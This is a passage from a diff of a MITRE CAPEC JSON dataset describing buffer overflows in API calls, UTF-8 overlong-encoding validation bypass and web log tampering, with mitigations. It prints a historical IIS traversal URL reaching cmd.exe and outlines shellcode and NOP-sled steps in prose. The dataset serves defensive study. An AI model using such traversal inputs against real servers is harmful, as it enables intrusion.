"course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)", + "id": "course-of-action--cfb918e7-7635-4a23-aa5e-27a2f7619338", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": 
"3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70f70a7f-5a5f-479e-ba10-554afaad269a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cfb918e7-7635-4a23-aa5e-27a2f7619338", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77731bb0-70b0-41b9-8671-78db70983fae", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test your path decoding process against malicious input.", + "id": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a701d96e-611d-4d01-988e-216e7c28a1a3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--83e41edb-f3d5-444b-b2a9-55f1329f2b68", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the application based on the requirements specifications. 
Input that does not match against the allowlist should not be permitted to enter into the system.", + "id": "course-of-action--832594fc-7b68-4057-b3f1-8bda4098d788", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d18cc586-8a23-43d4-b493-6352b03b104a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--832594fc-7b68-4057-b3f1-8bda4098d788", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An adversary who has knowledge of known vulnerable libraries or shared code can easily target software that makes use of these libraries. All clients that make use of the code library thus become vulnerable by association. 
This has a very broad effect on security across a system, usually affecting more than one software process.", + "external_references": [ + { + "external_id": "CAPEC-8", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/8.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow in an API Call", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Libc in FreeBSD\n A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once.\n ", + "\n Xtlib\n A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary, with knowledge of vulnerable libraries or shared code modules, identifies a target application or program that makes use of these.

Experiment

  1. Find injection vector: The adversary attempts to use the API, and if they can they send a large amount of data to see if the buffer overflow attack really does work.

  2. Techniques
    Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.
  3. Craft overflow content: The adversary crafts the content to be injected based on their knowledge of the vulnerability and their desired outcome. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the API as the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes an API to the user.", + "One or more API functions exposed by the target host has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1904d522-3156-4b2b-8861-ea295dd3490b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--948df80a-6252-4723-93a8-9c5b1a9daa17", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f52fdeab-0159-4aa3-aed5-3de1e3f31e4a", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--23598190-f719-4176-baf5-1e00d32e9cec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa5f5375-154b-486b-a60c-7eadb33e0a4f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. 
Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.", + "external_references": [ + { + "external_id": "CAPEC-80", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/80.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-112", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html" + }, + { + "description": "Michael Howard, David LeBlanc, Writing Secure Code, Microsoft Press", + "external_id": "REF-530", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Bruce Schneier, Security Risks of Unicode, Crypto-Gram Newsletter, 2000--07---15", + "external_id": "REF-531", + "source_name": "reference_from_CAPEC", + "url": "https://www.schneier.com/crypto-gram/archives/2000/0715.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-532", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/UTF-8" + }, + { + "description": "F. 
Yergeau, RFC 3629 - UTF-8, a transformation format of ISO 10646, 2003--11", + "external_id": "REF-533", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc3629.html" + }, + { + "description": "Eric Hacker, IDS Evasion with Unicode, 2001--01---03", + "external_id": "REF-114", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/infocus/1232" + }, + { + "description": "Corrigendum #1: UTF-8 Shortest Form, The Unicode Standard, 2001--03, Unicode, Inc.", + "external_id": "REF-535", + "source_name": "reference_from_CAPEC", + "url": "http://www.unicode.org/versions/corrigendum1.html" + }, + { + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "external_id": "REF-525", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html" + }, + { + "description": "Markus Kuhn, UTF-8 decoder capability and stress test, 2003--02---19", + "external_id": "REF-537", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/%7Emgk25/ucs/examples/UTF-8-test.txt" + } + ], + "id": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using UTF-8 Encoding to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + 
"x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this\n http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe\n the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.\n So when the attacker requested the tainted URL, they accessed\n http://servername/scripts/../../winnt/system32/cmd.exe\n In other words, they walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe.See also: CVE-2000-0884" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe entry points to locate vulnerabilities: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.
    Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.
    Try to use UTF-8 encoding of content in CSS in order to bypass validation routines.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770" + ], + "x_capec_prerequisites": [ + "The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.", + "Input filtering and validating is not done properly leaving the door open to harmful characters for the target host." + ], + "x_capec_skills_required": { + "Low": "An attacker can inject different representation of a filtered character in UTF-8 format.", + "Medium": "An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. 
Pay extra attention to the filtering of illegal characters.", + "id": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04696e3f-623a-46fd-bd0e-c253d001cba3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:\n \n 1. Insert a replacement character (e.g. '?', '').\n 2. Ignore the bytes.\n 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).\n 4. Not notice and decode as if the bytes were some similar bit of UTF-8.\n 5. Stop decoding and report an error (possibly giving the caller the option to continue).\n \n It is possible for a decoder to behave in different ways for different types of invalid input.\n RFC 3629 only requires that UTF-8 decoders must not decode \"overlong sequences\" (where a character is encoded in more bytes than needed but still adheres to the forms above). 
The Unicode Standard requires a Unicode-compliant decoder to \"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\"\n Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.\n To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.\n Another consideration is error recovery. 
To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.\n ", + "id": "course-of-action--4494e6e5-ca13-4533-8fe6-0a188984a0ec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67dc12df-3835-4e03-aa36-46e8bff6aeca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4494e6e5-ca13-4533-8fe6-0a188984a0ec", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. 
If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).", + "id": "course-of-action--2984b19d-0e72-4ebb-abaa-04953b80dbe3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9116b922-43a0-4491-8306-52e2c12b1dbf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2984b19d-0e72-4ebb-abaa-04953b80dbe3", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Look for overlong UTF-8 sequences starting with malicious pattern. 
You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn's UTF-8 and Unicode FAQ in reference section)", + "id": "course-of-action--d9b22e6b-a3b6-4d0c-9522-c3b147e28de5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9ec596d0-6f5a-467d-b542-5bcad89fb1d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9b22e6b-a3b6-4d0c-9522-c3b147e28de5", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee809e72-9489-47d3-8a97-15d2e21d67a6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. 
Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "external_id": "CAPEC-81", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Server Logs Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application Web Server Log File Format: The attacker observes the system and looks for indicators of which logging utility is being used by the web server.

  2. Techniques
    Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.

Experiment

  1. Determine Injectable Content: The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.

  2. Techniques
    Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.

Exploit

